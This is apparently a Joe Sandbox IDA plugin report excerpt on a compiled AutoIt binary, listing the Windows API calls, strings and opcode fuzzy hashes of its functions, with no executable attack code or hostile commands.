                                                                  • Opcode ID: 5458e7913af449a3161195f08952ad15069aaa9cae6d1fa76d892f2e1c19ac3a
                                                                  • Instruction ID: 9806afade59ca0ddc253778bd1e8c8b0eb43003a11a7ce55d4ad2d8b3f0ff5d7
                                                                  • Opcode Fuzzy Hash: 5458e7913af449a3161195f08952ad15069aaa9cae6d1fa76d892f2e1c19ac3a
                                                                  • Instruction Fuzzy Hash: 49A18F742043419FCB16EF24C952AAAB3A5BF84318F10896DB9565FBE2DB34EC09CB45
                                                                  APIs
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0038CF91
                                                                  • __swprintf.LIBCMT ref: 0038D032
                                                                  • _wcscmp.LIBCMT ref: 0038D045
                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0038D09A
                                                                  • _wcscmp.LIBCMT ref: 0038D0D6
                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 0038D10D
                                                                  • GetDlgCtrlID.USER32(?), ref: 0038D15F
                                                                  • GetWindowRect.USER32(?,?), ref: 0038D195
                                                                  • GetParent.USER32(?), ref: 0038D1B3
                                                                  • ScreenToClient.USER32(00000000), ref: 0038D1BA
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0038D234
                                                                  • _wcscmp.LIBCMT ref: 0038D248
                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0038D26E
                                                                  • _wcscmp.LIBCMT ref: 0038D282
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                  • String ID: %s%u
                                                                  • API String ID: 3119225716-679674701
                                                                  • Opcode ID: b7bfd047581a9d66402e12963acff55c8174e632216ff2fa86094cf0ef2b4b71
                                                                  • Instruction ID: a89f6a75e2214e6c25ea05c664d56a1c2230234f11e4142bab18b74af368502e
                                                                  • Opcode Fuzzy Hash: b7bfd047581a9d66402e12963acff55c8174e632216ff2fa86094cf0ef2b4b71
                                                                  • Instruction Fuzzy Hash: 99A1F371604302AFDB16EF64C884FAAB7ACFF44314F00895AF999D7190DB30EA55CBA1
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 0038D8EB
• _wcscmp.LIBCMT ref: 0038D8FC
• GetWindowTextW.USER32(00000001,?,00000400), ref: 0038D924
• CharUpperBuffW.USER32(?,00000000), ref: 0038D941
• _wcscmp.LIBCMT ref: 0038D95F
• _wcsstr.LIBCMT ref: 0038D970
• GetClassNameW.USER32(00000018,?,00000400), ref: 0038D9A8
• _wcscmp.LIBCMT ref: 0038D9B8
• GetWindowTextW.USER32(00000002,?,00000400), ref: 0038D9DF
• GetClassNameW.USER32(00000018,?,00000400), ref: 0038DA28
• _wcscmp.LIBCMT ref: 0038DA38
• GetClassNameW.USER32(00000010,?,00000400), ref: 0038DA60
• GetWindowRect.USER32(00000004,?), ref: 0038DAC9
Strings
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
• Opcode ID: 1914d0810d97d40990fabacb4a5942b191d4b13604d52c3b6d89037e0cf18574
• Instruction ID: 2df86522d7ff74f5c6cef8b111ed047aa7360e8c02e71c1845b4815bc66b2673
• Opcode Fuzzy Hash: 1914d0810d97d40990fabacb4a5942b191d4b13604d52c3b6d89037e0cf18574
• Instruction Fuzzy Hash: 9681C0310083059BDB17EF14C885FAA7BE8EF44714F1584AAFD8A9A0D6DB34DE45CBA1
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
• Opcode ID: eaaff5f913a49219ce0991c0b45a3311a13f959469474167f178e0614dbf8e5e
• Instruction ID: 36caa385072c5addd0afb6b34cf1a7d2849ae85bad390b180a3b02a13e879ceb
• Opcode Fuzzy Hash: eaaff5f913a49219ce0991c0b45a3311a13f959469474167f178e0614dbf8e5e
• Instruction Fuzzy Hash: 84317C31A44305AADB26FE50DE57FAD73789F20701F7000AAF841790E5EBA5AF08C759
APIs
• LoadIconW.USER32(00000063), ref: 0038EAB0
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0038EAC2
• SetWindowTextW.USER32(?,?), ref: 0038EAD9
• GetDlgItem.USER32(?,000003EA), ref: 0038EAEE
• SetWindowTextW.USER32(00000000,?), ref: 0038EAF4
• GetDlgItem.USER32(?,000003E9), ref: 0038EB04
• SetWindowTextW.USER32(00000000,?), ref: 0038EB0A
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0038EB2B
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0038EB45
• GetWindowRect.USER32(?,?), ref: 0038EB4E
• SetWindowTextW.USER32(?,?), ref: 0038EBB9
• GetDesktopWindow.USER32 ref: 0038EBBF
• GetWindowRect.USER32(00000000), ref: 0038EBC6
• MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0038EC12
• GetClientRect.USER32(?,?), ref: 0038EC1F
• PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0038EC44
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0038EC6F
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
• Opcode ID: bdf6d04efe2fd36eca2db48507d38e56877e59c180dd233fb68cc7634320f606
• Instruction ID: f59c60c6111f830db6c8a0678f8400f03a0aa56959db0ddf95ac06f8e9c0a933
• Opcode Fuzzy Hash: bdf6d04efe2fd36eca2db48507d38e56877e59c180dd233fb68cc7634320f606
• Instruction Fuzzy Hash: C7516D71900709AFDB22EFA8DD89F6EBBF9FF04704F004969E596A25A0C774E904CB50
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 003A79C6
• LoadCursorW.USER32(00000000,00007F00), ref: 003A79D1
• LoadCursorW.USER32(00000000,00007F03), ref: 003A79DC
• LoadCursorW.USER32(00000000,00007F8B), ref: 003A79E7
• LoadCursorW.USER32(00000000,00007F01), ref: 003A79F2
• LoadCursorW.USER32(00000000,00007F81), ref: 003A79FD
• LoadCursorW.USER32(00000000,00007F88), ref: 003A7A08
• LoadCursorW.USER32(00000000,00007F80), ref: 003A7A13
• LoadCursorW.USER32(00000000,00007F86), ref: 003A7A1E
• LoadCursorW.USER32(00000000,00007F83), ref: 003A7A29
• LoadCursorW.USER32(00000000,00007F85), ref: 003A7A34
• LoadCursorW.USER32(00000000,00007F82), ref: 003A7A3F
• LoadCursorW.USER32(00000000,00007F84), ref: 003A7A4A
• LoadCursorW.USER32(00000000,00007F04), ref: 003A7A55
• LoadCursorW.USER32(00000000,00007F02), ref: 003A7A60
• LoadCursorW.USER32(00000000,00007F89), ref: 003A7A6B
• GetCursorInfo.USER32(?), ref: 003A7A7B
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
• Opcode ID: 94d310f39413fabcd02d0c336d614351729db1c964cc830fc51661b7d34ca342
• Instruction ID: 712c2d83574108e576f94a811e68c58a0191492829b5c10888dff13200aa3fec
• Opcode Fuzzy Hash: 94d310f39413fabcd02d0c336d614351729db1c964cc830fc51661b7d34ca342
• Instruction Fuzzy Hash: F93113B0E0831A7ADB119FB68C8995FBFE8FF04750F50452AA50DE7280DA78A5008FA1
APIs
  • Part of subcall function 0036E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0035C8B7,?,00002000,?,?,00000000,?,0035419E,?,?,?,003EDC00), ref: 0036E984
  • Part of subcall function 0035660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003553B1,?,?,003561FF,?,00000000,00000001,00000000), ref: 0035662F
• __wsplitpath.LIBCMT ref: 0035C93E
  • Part of subcall function 00371DFC: __wsplitpath_helper.LIBCMT ref: 00371E3C
• _wcscpy.LIBCMT ref: 0035C953
• _wcscat.LIBCMT ref: 0035C968
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0035C978
• SetCurrentDirectoryW.KERNEL32(?), ref: 0035CABE
  • Part of subcall function 0035B337: _wcscpy.LIBCMT ref: 0035B36F
Strings
Similarity
• API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
• String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
• API String ID: 2258743419-1018226102
• Opcode ID: 4b657c773094aaeeda08626877d8d339d0913f250954d0196998fb9498ae9b51
• Instruction ID: d879a89065307af1d786ee79812155611d647d0639ce384edc28367b391b0cfe
• Opcode Fuzzy Hash: 4b657c773094aaeeda08626877d8d339d0913f250954d0196998fb9498ae9b51
• Instruction Fuzzy Hash: 791271715083419FC726EF24C841EAFBBE5BF99304F44891EF9899B261DB30DA49CB52
APIs
• _memset.LIBCMT ref: 003BCEFB
• DestroyWindow.USER32(?,?), ref: 003BCF73
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003BCFF4
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003BD016
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003BD025
• DestroyWindow.USER32(?), ref: 003BD042
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00350000,00000000), ref: 003BD075
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003BD094
• GetDesktopWindow.USER32 ref: 003BD0A9
• GetWindowRect.USER32(00000000), ref: 003BD0B0
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003BD0C2
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003BD0DA
  • Part of subcall function 0036B526: GetWindowLongW.USER32(?,000000EB), ref: 0036B537
Strings
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
• String ID: 0$tooltips_class32
• API String ID: 3877571568-3619404913
• Opcode ID: 78447961e28836f7d5227dcbf12a571a725ce863dba2e57b7e43d00e404789e0
• Instruction ID: 97869a373d1496a2d1ed09f193358d3968349215123fbdceb8af99a792d435cf
• Opcode Fuzzy Hash: 78447961e28836f7d5227dcbf12a571a725ce863dba2e57b7e43d00e404789e0
• Instruction Fuzzy Hash: 3771F1B0540305AFD722DF28CC85FB677E9EB88708F44451DFA85872A1E735E942CB56
APIs
  • Part of subcall function 0036B34E: GetWindowLongW.USER32(?,000000EB), ref: 0036B35F
• DragQueryPoint.SHELL32(?,?), ref: 003BF37A
  • Part of subcall function 003BD7DE: ClientToScreen.USER32(?,?), ref: 003BD807
  • Part of subcall function 003BD7DE: GetWindowRect.USER32(?,?), ref: 003BD87D
  • Part of subcall function 003BD7DE: PtInRect.USER32(?,?,003BED5A), ref: 003BD88D
• SendMessageW.USER32(?,000000B0,?,?), ref: 003BF3E3
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003BF3EE
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003BF411
• _wcscat.LIBCMT ref: 003BF441
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 003BF458
• SendMessageW.USER32(?,000000B0,?,?), ref: 003BF471
• SendMessageW.USER32(?,000000B1,?,?), ref: 003BF488
• SendMessageW.USER32(?,000000B1,?,?), ref: 003BF4AA
• DragFinish.SHELL32(?), ref: 003BF4B1
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003BF59C
Strings
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
• Opcode ID: efe082ed3d610479cb46782c7f4fad0ce860305e42b6de051fa8456379b74aa5
• Instruction ID: 16ffb322388237f6d07051f055f15c11c185710c5f9598f5435f687ba4a16500
• Opcode Fuzzy Hash: efe082ed3d610479cb46782c7f4fad0ce860305e42b6de051fa8456379b74aa5
• Instruction Fuzzy Hash: FA614B71108301AFC712EF64DC45E9BBBF8EF89714F404A2EF695961A1DB709A09CB52
APIs
• VariantInit.OLEAUT32(00000000), ref: 0039AB3D
• VariantCopy.OLEAUT32(?,?), ref: 0039AB46
• VariantClear.OLEAUT32(?), ref: 0039AB52
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0039AC40
• __swprintf.LIBCMT ref: 0039AC70
• VarR8FromDec.OLEAUT32(?,?), ref: 0039AC9C
• VariantInit.OLEAUT32(?), ref: 0039AD4D
• SysFreeString.OLEAUT32(00000016), ref: 0039ADDF
• VariantClear.OLEAUT32(?), ref: 0039AE35
• VariantClear.OLEAUT32(?), ref: 0039AE44
• VariantInit.OLEAUT32(00000000), ref: 0039AE80
Strings
Similarity
• API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 3730832054-3931177956
• Opcode ID: bd57efe4f8da1b7f47bff6b6fe14875a64f6d6b89bc379f0e551b8921c05561b
• Instruction ID: 832f41d4afe4bf664c088478e551a03da0aa6962b6503bdd71e0ca624bf84393
• Opcode Fuzzy Hash: bd57efe4f8da1b7f47bff6b6fe14875a64f6d6b89bc379f0e551b8921c05561b
• Instruction Fuzzy Hash: 5BD10271A00A19DBCF23AF65D885B6AB7B9FF04710F268256E4059F590DB70EC40DBE2
APIs
• CharUpperBuffW.USER32(?,?), ref: 003B71FC
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003B7247
Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharMessageSendUpper
                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                  • API String ID: 3974292440-4258414348
                                                                  • Opcode ID: d962e0fb052f02e045d24c2e9551fe352ada9374696327ad1fbf3597c6b97cbe
                                                                  • Instruction ID: 0a5d3f8a0b10939705120b952d4c0dc5011d70e572541dd42a0952fdc8bf2fa8
                                                                  • Opcode Fuzzy Hash: d962e0fb052f02e045d24c2e9551fe352ada9374696327ad1fbf3597c6b97cbe
                                                                  • Instruction Fuzzy Hash: 9D9181742047018FCB06EF10C451AAEB7A5EF84314F118869FD966FBA2DB34ED0ACB95
                                                                  APIs
                                                                  • EnumChildWindows.USER32(?,0038CF50), ref: 0038CE90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ChildEnumWindows
                                                                  • String ID: 4+@$CLASS$CLASSNN$H+@$INSTANCE$L+@$NAME$P+@$REGEXPCLASS$T+@$TEXT
                                                                  • API String ID: 3555792229-691921414
                                                                  • Opcode ID: 51019699a0973a77a919ebae3f6c558ea33ace453b98df59db80375941b02794
                                                                  • Instruction ID: b9b4089f2518b454cfea1b25abb2540de7afff664b13d98ddde9a9ab52a05959
                                                                  • Opcode Fuzzy Hash: 51019699a0973a77a919ebae3f6c558ea33ace453b98df59db80375941b02794
                                                                  • Instruction Fuzzy Hash: 519183306106069ACB1AFF60C481BEAFB75BF04300F5095AAE959AB191DF30795ECBE4
                                                                  APIs
                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003BE5AB
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003BBEAF), ref: 003BE607
                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003BE647
                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003BE68C
                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003BE6C3
                                                                  • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,003BBEAF), ref: 003BE6CF
                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003BE6DF
                                                                  • DestroyIcon.USER32(?,?,?,?,?,003BBEAF), ref: 003BE6EE
                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003BE70B
                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003BE717
                                                                    • Part of subcall function 00370FA7: __wcsicmp_l.LIBCMT ref: 00371030
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                  • String ID: .dll$.exe$.icl
                                                                  • API String ID: 1212759294-1154884017
                                                                  • Opcode ID: 3f7beac1efef60c978f72a2429c6dc4e8b3661bd3640b72fa2c815b52a4b80a1
                                                                  • Instruction ID: 0472f9a932dacbfb9b53f7f1ac62b4f98838138a078463de364642a4d31d630f
                                                                  • Opcode Fuzzy Hash: 3f7beac1efef60c978f72a2429c6dc4e8b3661bd3640b72fa2c815b52a4b80a1
                                                                  • Instruction Fuzzy Hash: AA61C171500215FAEB26DF68DC46FEE77ACBB09719F108106FA15EA1D0EB74E980C7A0
                                                                  APIs
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                  • CharLowerBuffW.USER32(?,?), ref: 0039D292
                                                                  • GetDriveTypeW.KERNEL32 ref: 0039D2DF
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0039D327
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0039D35E
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0039D38C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                  • API String ID: 1148790751-4113822522
                                                                  • Opcode ID: ffbddb3e75375426393a76b0a956f4b62dcbaaa26e0417ce125f13dcca388a01
                                                                  • Instruction ID: 4979be6f001717eca9fb502574a997a6abc8c6b11d900b7b9a7347f8309dfc8a
                                                                  • Opcode Fuzzy Hash: ffbddb3e75375426393a76b0a956f4b62dcbaaa26e0417ce125f13dcca388a01
                                                                  • Instruction Fuzzy Hash: 28514D756047059FC701EF10C892D6AB7F8EF98759F10886DF8856B2A1DB31EE09CB82
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,003C3973,00000016,0000138C,00000016,?,00000016,003EDDB4,00000000,?), ref: 003926F1
                                                                  • LoadStringW.USER32(00000000,?,003C3973,00000016), ref: 003926FA
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,003C3973,00000016,0000138C,00000016,?,00000016,003EDDB4,00000000,?,00000016), ref: 0039271C
                                                                  • LoadStringW.USER32(00000000,?,003C3973,00000016), ref: 0039271F
                                                                  • __swprintf.LIBCMT ref: 0039276F
                                                                  • __swprintf.LIBCMT ref: 00392780
                                                                  • _wprintf.LIBCMT ref: 00392829
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00392840
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                  • API String ID: 618562835-2268648507
                                                                  • Opcode ID: 1cb4f1bb738f49282ff342efaab1da679cc107374018040a8701233c183dcabf
                                                                  • Instruction ID: 66df11e4667086e0825b3582a41a34531171de6e84fd664a549262b31713abaf
                                                                  • Opcode Fuzzy Hash: 1cb4f1bb738f49282ff342efaab1da679cc107374018040a8701233c183dcabf
                                                                  • Instruction Fuzzy Hash: 34414072800619BACF16FBD0DD96EEFB77CAF14345F100065B9057A0A2EA746F09CB60
                                                                  APIs
                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0039D0D8
                                                                  • __swprintf.LIBCMT ref: 0039D0FA
                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0039D137
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0039D15C
                                                                  • _memset.LIBCMT ref: 0039D17B
                                                                  • _wcsncpy.LIBCMT ref: 0039D1B7
                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0039D1EC
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0039D1F7
                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 0039D200
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0039D20A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                  • String ID: :$\$\??\%s
                                                                  • API String ID: 2733774712-3457252023
                                                                  • Opcode ID: 3763975cee1b97e3187a282b209fb904fe6f44c8ebfc24c98e0bbdb37a54af9e
                                                                  • Instruction ID: 3f74df1aa47d260485c7e8dca9ebaeaf1cf72510f0083a3db0f1338af6bb931d
                                                                  • Opcode Fuzzy Hash: 3763975cee1b97e3187a282b209fb904fe6f44c8ebfc24c98e0bbdb37a54af9e
                                                                  • Instruction Fuzzy Hash: D83181B6500109ABDB22DFA4DC49FEB77BCEF89740F1040B6F509D61A1E774D6458B24
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,003BBEF4,?,?), ref: 003BE754
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,003BBEF4,?,?,00000000,?), ref: 003BE76B
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,003BBEF4,?,?,00000000,?), ref: 003BE776
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,003BBEF4,?,?,00000000,?), ref: 003BE783
                                                                  • GlobalLock.KERNEL32(00000000), ref: 003BE78C
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,003BBEF4,?,?,00000000,?), ref: 003BE79B
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 003BE7A4
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,003BBEF4,?,?,00000000,?), ref: 003BE7AB
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003BBEF4,?,?,00000000,?), ref: 003BE7BC
                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,003DD9BC,?), ref: 003BE7D5
                                                                  • GlobalFree.KERNEL32(00000000), ref: 003BE7E5
                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 003BE809
                                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 003BE834
                                                                  • DeleteObject.GDI32(00000000), ref: 003BE85C
                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003BE872
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                  • String ID:
                                                                  • API String ID: 3840717409-0
